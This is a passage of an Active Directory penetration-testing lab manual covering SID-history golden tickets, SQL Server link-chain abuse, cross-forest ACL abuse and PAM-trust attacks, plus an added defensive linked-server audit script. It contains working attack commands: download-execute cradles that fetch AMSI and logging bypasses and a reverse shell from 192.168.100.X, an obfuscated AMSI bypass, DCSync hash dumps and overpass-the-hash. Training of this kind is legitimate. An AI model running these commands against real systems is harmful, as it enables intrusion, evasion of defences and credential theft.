With InvisiShell set up on eu-dc, we can now use the Active Directory module. Since we are on a domain
controller, the module is already present.

Check if there are any groups with RID greater than 1000 in euvendor.local that we can impersonate, as such SIDs
are not removed by SID filtering:

PS C:\Users\Administrator> Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local
Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local

[snip]

DistinguishedName : CN=EUAdmins,CN=Users,DC=euvendor,DC=local
GroupCategory : Security
GroupScope : Global
Name : EUAdmins
ObjectClass : group
ObjectGUID : 1dad0633-fcf5-49dc-9431-8b167cf36969
SamAccountName : euadmins
SID : S-1-5-21-4066061358-3942393892-617142613-1103

PS C:\Users\Administrator> exit
exit

C:\Users\Administrator>set COR_ENABLE_PROFILING=

C:\Users\Administrator>set COR_PROFILER=

C:\Users\Administrator>REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

Let's create an inter-realm ticket between eu.local and euvendor.local. We will inject the SID History for
the EUAdmins group as that is allowed across the trust:

C:\Users\Administrator>C:\Users\Public\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-
1274645009 /rc4:629b1eaa7ec6cfe2f4943a853ad6b36b /service:krbtgt
/target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-1103
/ticket:C:\Users\Public\euvendornet.kirbi" "exit"
[snip]

Using the inter-realm TGT that we created above, let's request a TGS for HTTP on euvendor-net
machine:

C:\Users\Administrator>C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\euvendornet.kirbi /service:HTTP/euvendor-
net.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

[snip]
ServiceName : HTTP/euvendor-net.euvendor.local
ServiceRealm : EUVENDOR.LOCAL
UserName : Administrator
UserRealm : eu.local
StartTime : 1/15/2021 7:38:46 AM
EndTime : 1/15/2021 5:38:46 PM
[snip]

Finally, try accessing the euvendor-net machine:

C:\Users\Administrator>winrs -r:euvendor-net.euvendor.local cmd
winrs -r:euvendor-net.euvendor.local cmd

Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.EU>whoami
whoami
eu\administrator

C:\Users\Administrator.EU>hostname
hostname
EUVendor-Net

C:\Users\Administrator.EU>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID                                           Attributes
==================================== ================ ============================================= ===============================================================
Everyone                             Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
EU\Domain Admins                     Group            S-1-5-21-3657428294-2017276338-1274645009-512 Mandatory group, Enabled by default, Enabled group
EU\Group Policy Creator Owners       Group            S-1-5-21-3657428294-2017276338-1274645009-520 Mandatory group, Enabled by default, Enabled group
EU\Schema Admins                     Group            S-1-5-21-3657428294-2017276338-1274645009-518 Mandatory group, Enabled by default, Enabled group
EU\Enterprise Admins                 Group            S-1-5-21-3657428294-2017276338-1274645009-519 Mandatory group, Enabled by default, Enabled group
EUVENDOR\euadmins                    Group            S-1-5-21-4066061358-3942393892-617142613-1103 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

Hands-On 26:
Task
• Get a reverse shell on a db-sqlsrv in db.local forest by abusing database links from us-mssql.

Solution
Let's first enumerate database links on all the SQL servers; we only need public access for that. Let's
see if studentuserx has that access on any database in the domain. We will use PowerUpSQL for this
from InvisiShell:

PS C:\AD\Tools> Import-Module .\PowerupSQL-master\PowerupSQL.psd1
PS C:\AD\Tools> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: us-mssql.us.techcorp.local : Connection Success.

ComputerName : us-mssql.us.techcorp.local
Instance : US-MSSQL
DomainName : US
ServiceProcessID : 3032
ServiceName : MSSQLSERVER
ServiceAccount : US\dbservice
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 14.0.1000.169
SQLServerMajorVersion : 2017
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : US\studentuserx
IsSysadmin : No
ActiveSessions : 1

So we have non-sysadmin access to us-mssql. Let's enumerate database links for us-mssql:

PS C:\AD\Tools> Get-SQLServerLink -Instance us-mssql.us.techcorp.local -Verbose
VERBOSE: us-mssql.us.techcorp.local : Connection Success.

[snip]

ComputerName : us-mssql.us.techcorp.local
Instance : us-mssql.us.techcorp.local
DatabaseLinkId : 1
DatabaseLinkName : 192.168.23.25
DatabaseLinkLocation : Remote
Product : SQL Server

Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 7/9/2019 6:54:54 AM

So, there is a database link to another SQL Server from the us-mssql server. Using the HeidiSQL client, let's log in to us-mssql
using Windows authentication as studentuserx. Once logged in, list the linked servers, then use openquery to run queries
through them:

select * from master..sysservers

It is possible to nest openquery within another openquery, which leads us to db-sqlsrv:

select * from openquery("192.168.23.25",'select * from master..sysservers')

select * from openquery("192.168.23.25",'select * from openquery("db-sqlsrv",''select @@version as version'')')

We can also use Get-SQLServerLinkCrawl from PowerUpSQL for crawling the database links
automatically:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Verbose
VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: US-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL
VERBOSE: - Link Login: US\studentuserx
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: 192.168.23.25
VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.

VERBOSE: --------------------------------
VERBOSE: Server: DB-SQLPROD
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL -> 192.168.23.25
VERBOSE: - Link Login: dbuser
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DB-SQLSRV
VERBOSE: us-mssql : Connection Success.
VERBOSE: us-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DB-SQLSRV
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: US-MSSQL -> 192.168.23.25 -> DB-SQLSRV
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:

Version : SQL Server 2017
Instance : US-MSSQL
CustomQuery :
Sysadmin : 0
Path : {US-MSSQL}
User : US\studentuserx
Links : {192.168.23.25}

Version : SQL Server 2017
Instance : DB-SQLPROD
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017
Instance : DB-SQLSRV
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

So, we do have database links to other SQL Servers.

If xp_cmdshell is enabled (or RPC Out is true, which lets us enable xp_cmdshell), it is possible to
execute commands on any node in the database link chain using the below commands.

Try to execute a command on each node where xp_cmdshell is enabled:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''whoami'''

Version : SQL Server 2017
Instance : US-MSSQL
CustomQuery :
Sysadmin : 0
Path : {US-MSSQL}
User : US\studentuserx
Links : {192.168.23.25}

Version : SQL Server 2017
Instance : DB-SQLPROD
CustomQuery : {nt service\mssqlserver, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017
Instance : DB-SQLSRV
CustomQuery :
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

Sweet! Looks like we can run operating system commands on DB-SQLPROD instance.

Let’s try to execute a PowerShell reverse shell. We must first start a listener from InvisiShell:

PS C:\AD\Tools> . .\powercat.ps1
PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)

Now, use the PowerShell download-execute cradle to run the reverse shell on DB-SQLPROD. Note that in
the below command we first run a Script Block logging bypass, then an AMSI bypass and finally the
reverse shell. Remember to host all of them on a local web server:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://192.168.100.X/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://192.168.100.X/amsibypass.txt);iex (iwr -UseBasicParsing http://192.168.100.X/Invoke-PowerShellTcpEx.ps1)"'''
[snip]

On the listener on 192.168.100.X (note that you may need to press Enter a couple of times on the powercat
listener to wake it up):

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.23.25] port [tcp] accepted (source port
52937)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between
Streams...

Windows PowerShell running as user MSSQLSERVER on DB-SQLPROD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt service\mssqlserver
PS C:\Windows\system32> hostname
DB-SQLProd

Because the link from DB-SQLProd to DB-SQLSrv is configured to use sa, we can enable RPC Out and
xp_cmdshell on DB-SQLSrv! Run the below commands on the reverse shell we got above. Ignore the
scary looking message after the first command:

PS C:\Windows\system32> Invoke-SqlCmd -Query "exec sp_serveroption @server='db-sqlsrv', @optname='rpc', @optvalue='TRUE'"
Import-Module : The specified module 'SQLASCmdlets' was not loaded because no
valid module file was found in any module directory.
PS C:\Windows\system32> Invoke-SqlCmd -Query "exec sp_serveroption
@server='db-sqlsrv', @optname='rpc out', @optvalue='TRUE'"
PS C:\Windows\system32> Invoke-SqlCmd -Query "EXECUTE ('sp_configure ''show
advanced options'',1;reconfigure;') AT ""db-sqlsrv"""
PS C:\Windows\system32> Invoke-SqlCmd -Query "EXECUTE('sp_configure
''xp_cmdshell'',1;reconfigure') AT ""db-sqlsrv"""

PS C:\Windows\system32> exit
VERBOSE: Failed to redirect data from Stream 1 to Stream 2

Let's try to execute commands on all the link nodes again and check if it works on db-sqlsrv too:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''whoami'''
[snip]
Version : SQL Server 2017
Instance : DB-SQLPROD
CustomQuery : {nt service\mssqlserver, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25}
User : dbuser
Links : {DB-SQLSRV}

Version : SQL Server 2017
Instance : DB-SQLSRV
CustomQuery : {db\srvdba, }
Sysadmin : 1
Path : {US-MSSQL, 192.168.23.25, DB-SQLSRV}
User : sa
Links :

Sweet!

Now, to execute commands only on a particular node (DB-SQLSRV), use the below command in
HeidiSQL. Remember to start the listener before running the below command:

select * from openquery("192.168.23.25",'select * from openquery("db-sqlsrv",''select @@version as version;exec master..xp_cmdshell ''''powershell -c "iex (iwr -UseBasicParsing http://192.168.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://192.168.100.x/amsibypass.txt);iex (iwr -UseBasicParsing http://192.168.100.x/Invoke-PowerShellTcp.ps1)"'''''')')

or use the below command from PowerUpSQL:

PS C:\AD\Tools> Get-SQLServerLinkCrawl -Instance us-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://192.168.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://192.168.100.x/amsibypass.txt);iex (iwr -UseBasicParsing http://192.168.100.x/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget db-sqlsrv

[snip]

On the listener:

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.23.36] port [tcp] accepted (source port
54015)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between
Streams...
Windows PowerShell running as user srvdba on DB-SQLSRV
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
db\srvdba
PS C:\Windows\system32> $env:UserDNSDomain
DB.LOCAL
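As an added example that is not part of the lab manual or of PowerUpSQL, the same link chain seen from the administrator's side: the function below audits the linked servers of one instance with Invoke-Sqlcmd from the SqlServer module and flags the settings this exercise relied on (a remote login of sa, one stored remote credential shared by all local logins, RPC Out enabled, xp_cmdshell enabled on the instance). The function name and flag labels are assumptions; sys.servers, sys.linked_logins, sys.server_principals and sys.configurations are the catalog views it reads, and the login running it must be allowed to read them.

```powershell
# Added example, not from the lab manual or PowerUpSQL: audit the linked
# servers of one SQL Server instance and flag the settings Hands-On 26 relied
# on. Assumes the SqlServer module (Invoke-Sqlcmd) and a login allowed to read
# the server-level catalog views. Function name and flag labels are assumptions.
function Get-LinkedServerRisk {
    [CmdletBinding()]
    param(
        # Instance to audit, e.g. us-mssql.us.techcorp.local
        [Parameter(Mandatory)]
        [string]$Instance
    )

    # sys.servers lists the links, sys.linked_logins the login mapping.
    # local_principal_id 0 is the default mapping that applies to all logins.
    $linkQuery = @"
SELECT s.name, s.data_source, s.is_rpc_out_enabled, s.is_data_access_enabled,
       ISNULL(p.name, '<all logins>') AS local_login,
       l.uses_self_credential, l.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1;
"@
    # Current xp_cmdshell state of the audited instance itself.
    $cmdshellQuery = "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';"
    $cmdshellOn = [bool](Invoke-Sqlcmd -ServerInstance $Instance -Query $cmdshellQuery).value_in_use

    foreach ($link in (Invoke-Sqlcmd -ServerInstance $Instance -Query $linkQuery)) {
        # NULL columns come back as DBNull, so normalise them before testing.
        $selfCred   = ($link.uses_self_credential -is [bool]) -and $link.uses_self_credential
        $remoteName = if ($link.remote_name -is [string]) { $link.remote_name } else { $null }
        $shownLogin = if ($selfCred) { '<impersonate>' } else { $remoteName }
        $flags      = New-Object System.Collections.Generic.List[string]

        if ($remoteName -eq 'sa') {
            # Every mapped local login reaches the remote as sysadmin
            # (the DB-SQLProd -> DB-SQLSrv link above).
            $flags.Add('RemoteLoginIsSa')
        }
        if ($link.local_login -eq '<all logins>' -and -not $selfCred -and $remoteName) {
            # One stored remote credential is shared by all local logins, so a
            # low-privileged login inherits it through the link.
            $flags.Add('SharedRemoteCredentialForAllLogins')
        }
        if ($link.is_rpc_out_enabled) {
            # EXECUTE (...) AT <link> works, so sp_configure can be run remotely.
            $flags.Add('RpcOutEnabled')
        }

        [pscustomobject]@{
            Instance             = $Instance
            Link                 = $link.name
            DataSource           = $link.data_source
            LocalLogin           = $link.local_login
            RemoteLogin          = $shownLogin
            DataAccessEnabled    = [bool]$link.is_data_access_enabled
            RpcOutEnabled        = [bool]$link.is_rpc_out_enabled
            XpCmdShellOnInstance = $cmdshellOn
            RiskFlags            = ($flags -join ', ')
        }
    }
}

# Start at the instance the student user can reach; repeat on each hop.
Get-LinkedServerRisk -Instance us-mssql.us.techcorp.local | Format-Table -AutoSize
```

Run it on every instance in the chain, since each hop's links are only visible from that hop.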

Hands-On 27:
Task
• Using the reverse shell on db.local:
− Execute cross forest attack on dbvendor.local by abusing ACLs
• Enumerate FSPs for db.local and escalate privileges to DA by compromising the FSPs.

Solution
On the reverse shell we have on db-sqlsrv, we can use PowerView to enumerate ACLs.

Run the following commands on the reverse shell. We are bypassing AMSI first and then using a
download-execute cradle to load PowerView:

PS C:\Windows\system32> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') +


('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (
('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

PS C:\Windows\system32> iex (New-Object Net.WebClient).DownloadString('http://192.168.100.x/PowerView.ps1')
PS C:\Windows\system32> Get-ForestTrust

TopLevelNames : {dbvendor.local}
ExcludedTopLevelNames : {}
TrustedDomainInformation : {dbvendor.local}
SourceName : db.local
TargetName : dbvendor.local
TrustType : Forest
TrustDirection : Bidirectional

Enumerate interesting ACLs in the dbvendor.local domain:

PS C:\Windows\system32> Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local
[snip]
ObjectDN : CN=dbxsvc,CN=Users,DC=dbvendor,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed

InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-4101
IdentityReferenceName : srvdba
IdentityReferenceDomain : db.local
IdentityReferenceDN : CN=srvdba,CN=Users,DC=db,DC=local
IdentityReferenceClass : user

ObjectDN : CN=db24svc,CN=Users,DC=dbvendor,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-1105
IdentityReferenceName : srvdba
IdentityReferenceDomain : db.local
IdentityReferenceDN : CN=srvdba,CN=Users,DC=db,DC=local
IdentityReferenceClass : user
[snip]

So, srvdba has GenericAll over the dbxsvc users in the dbvendor.local domain. With GenericAll on a user object we
can do many things, like resetting the password or setting an SPN on the user. Reset the password of the dbxsvc user that
matches your student user ID:

PS C:\Windows\system32> Set-DomainUserPassword -Identity dbxsvc -AccountPassword (ConvertTo-SecureString 'Password@123' -AsPlainText -Force) -Domain dbvendor.local -Verbose
[snip]

Sweet! We just got access to the dbxsvc user in dbvendor.local. Now, let's enumerate FSPs for db.local.
Run the below commands on the reverse shell:

PS C:\Windows\system32> Find-ForeignGroup -Verbose

[snip]
GroupDomain : db.local
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=db,DC=local
MemberDomain : db.local
MemberName : S-1-5-21-569087967-1859921580-1949641513-4102
MemberDistinguishedName : CN=S-1-5-21-569087967-1859921580-1949641513-
4102,CN=ForeignSecurityPrincipals,DC=db,DC=local

GroupDomain : db.local
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=db,DC=local
MemberDomain : db.local
MemberName : S-1-5-21-569087967-1859921580-1949641513-4101

MemberDistinguishedName : CN=S-1-5-21-569087967-1859921580-1949641513-
4101,CN=ForeignSecurityPrincipals,DC=db,DC=local
[snip]

And no surprise, the FSPs who are part of the built-in Administrators group are the dbxsvc users:

PS C:\Windows\system32> Get-DomainUser -Domain dbvendor.local | ?{$_.ObjectSid -eq 'S-1-5-21-569087967-1859921580-1949641513-4101'}

logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=db23svc,CN=Users,DC=dbvendor,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : db23svc
userprincipalname : db23svc
name : db23svc
objectsid : S-1-5-21-569087967-1859921580-1949641513-4101
samaccountname : db23svc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/8/2021 6:18:45 AM
instancetype : 4
usncreated : 41125
objectguid : 60d90772-7a30-4217-81ec-71d28c4ae797
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory :
CN=Person,CN=Schema,CN=Configuration,DC=dbvendor,DC=local
dscorepropagationdata : {1/8/2021 6:18:45 AM, 1/8/2021 6:18:45 AM, 1/1/1601
12:00:00 AM}
givenname : db23
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
cn : db23svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/8/2021 6:18:45 AM
primarygroupid : 513
pwdlastset : 1/7/2021 10:18:45 PM
usnchanged : 41130
[snip]

This means we can escalate privileges in db.local using the credentials of dbxsvc, either with winrs or with the
PowerShell Remoting cmdlets.

Using winrs on the reverse shell:

PS C:\Windows\system32> winrs -r:db-dc.db.local -u:dbvendor\dbxsvc -p:Password@123 "whoami"
dbvendor\db23svc

Using PowerShell Remoting on the reverse shell:

PS C:\Windows\system32> $passwd = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object
System.Management.Automation.PSCredential ("dbvendor\dbxsvc", $passwd)
PS C:\Windows\system32> $dbdc = New-PSSession -Computername db-dc.db.local -
Credential $creds
PS C:\Windows\system32> Invoke-Command -scriptblock{whoami;hostname} -Session
$dbdc
dbvendor\dbxsvc
DB-DC

Hands-On 28:
Task
• Compromise production.local by abusing PAM trust between bastion.local and production.local

Solution
First, we need to compromise bastion.local. We have DA on techcorp.local that has a two-way trust with
bastion.local.

Let's enumerate Foreign Security Principals on bastion.local to check if there is anything interesting.
Using the Active Directory module from InvisiShell:

PS C:\AD\Tools> Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local

DistinguishedName                                                                                  Name                                          ObjectClass
-----------------                                                                                  ----                                          -----------
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=bastion,DC=local                                        S-1-5-4                                       foreignSecurityPrinc...
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=bastion,DC=local                                       S-1-5-11                                      foreignSecurityPrinc...
CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=bastion,DC=local                                       S-1-5-17                                      foreignSecurityPrinc...
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=bastion,DC=local                                        S-1-5-9                                       foreignSecurityPrinc...
CN=S-1-5-21-2781415573-3701854478-2406986946-500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local  S-1-5-21-2781415573-3701854478-2406986946-500 foreignSecurityPrinc...

So, the DA of techcorp.local is a part of a group on bastion.local. To find out which group it is a member
of, run the below command:

PS C:\AD\Tools> Get-ADGroup -Filter * -Properties Member -Server bastion.local | ?{$_.Member -match 'S-1-5-21-2781415573-3701854478-2406986946-500'}

DistinguishedName : CN=Administrators,CN=Builtin,DC=bastion,DC=local
GroupCategory : Security
GroupScope : DomainLocal
Member : {CN=S-1-5-21-2781415573-3701854478-2406986946-
500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local, CN=Domain
Admins,CN=Users,DC=bastion,DC=local,
CN=Enterprise Admins,CN=Users,DC=bastion,DC=local,
CN=Administrator,CN=Users,DC=bastion,DC=local}
Name : Administrators

ObjectClass : group
ObjectGUID : 788f92b1-3806-4eef-bcaa-dd8111f45aa5
SamAccountName : Administrators
SID : S-1-5-32-544

Sweet! The administrator of techcorp.local is a member of the built-in Administrators group on
bastion.local. That makes things simple!

Let's access bastion-dc as administrator. Run the below command from an elevated shell on the student
VM to use Overpass-the-hash:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:techcorp.local /user:administrator /aes256:58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883 /dc:techcorp-dc.techcorp.local /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process that spawns up, run the below commands to download and use InvisiShell:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\bastion-dc.bastion.local\C$\Users\Public\InShellProf.dll /Y
[snip]
C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\bastion-
dc.bastion.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:bastion-dc.bastion.local cmd
C:\Users\Administrator.TECHCORP>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

Check if PAM trust is enabled. First enumerate trusts on bastion.local. Because we are already on a
domain controller, we can use the Active Directory module:

PS C:\Users\Administrator.TECHCORP> Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}

PSComputerName : bastion-dc.bastion.local
RunspaceId : 7fb698b7-72a7-4458-bd5c-1aa1326e399e
Direction : Outbound
DisallowTransivity : False
DistinguishedName : CN=techcorp.local,CN=System,DC=bastion,DC=local
[snip]

PSComputerName : bastion-dc.bastion.local
RunspaceId : 7fb698b7-72a7-4458-bd5c-1aa1326e399e
Direction : Inbound
DisallowTransivity : False
DistinguishedName : CN=production.local,CN=System,DC=bastion,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : production.local
ObjectClass : trustedDomain
ObjectGUID : 3e0958ef-54c4-4afe-b4df-672150c1dbfc
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=bastion,DC=local
Target : production.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
PS C:\Users\Administrator.TECHCORP> exit
exit
[snip]
C:\Users\Administrator.TECHCORP> exit
exit

Once we know that there is a ForestTransitive trust and SIDFilteringForestAware is false on the bastion.local side, enumerate
trusts on production.local to be sure that a PAM trust is in use. If we try to access production.local from the
session on bastion.local we will face the double hop issue, so we need to use Overpass-the-hash with the
credentials of the Administrator of bastion.local.

First, we will use the privileges of domain administrator of techcorp.local to extract credentials of
domain administrator for bastion.local. Use the below command in the command prompt that we used
above:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync
/user:bastion\Administrator /domain:bastion.local" "exit"

[snip]

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/12/2019 9:49:56 PM
Object Security ID : S-1-5-21-284138346-1733301406-1958478260-500
Object Relative ID : 500

Credentials:
Hash NTLM: f29207796c9e6829aa1882b7cccfa36d

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 31b615437127e4a4badbea412c32e37f

* Primary:Kerberos-Newer-Keys *
Default Salt : BASTION-DCAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292
aes128_hmac (4096) : e8679f4d4ed30fe9d2aeabb8b5e5398e
[snip]

Run the below command from an elevated shell on the student VM to use Overpass-the-hash and start a
process with the privileges of domain administrator of bastion.local:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:bastion.local /user:administrator /aes256:a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292 /dc:bastion-dc.bastion.local /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process, use the below commands to copy and use InvisiShell:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\bastion-dc.bastion.local\C$\Users\Public\InShellProf.dll /Y
[snip]
C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\bastion-dc.bastion.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:bastion-dc.bastion.local cmd
C:\Users\Administrator>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

We are now ready to enumerate production.local. Run the below commands on bastion-dc:

PS C:\Users\Administrator> Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} -Server production.local

Direction : Outbound
DisallowTransivity : False
DistinguishedName : CN=bastion.local,CN=System,DC=production,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : bastion.local
ObjectClass : trustedDomain
ObjectGUID : f6ebbca6-749d-4ee6-bb6d-d3bbb178fd02
SelectiveAuthentication : False
SIDFilteringForestAware : True
SIDFilteringQuarantined : False
Source : DC=production,DC=local
Target : bastion.local
TGTDelegation : False
TrustAttributes : 1096
[snip]

So we now know that SID History is allowed for access from bastion.local to production.local.
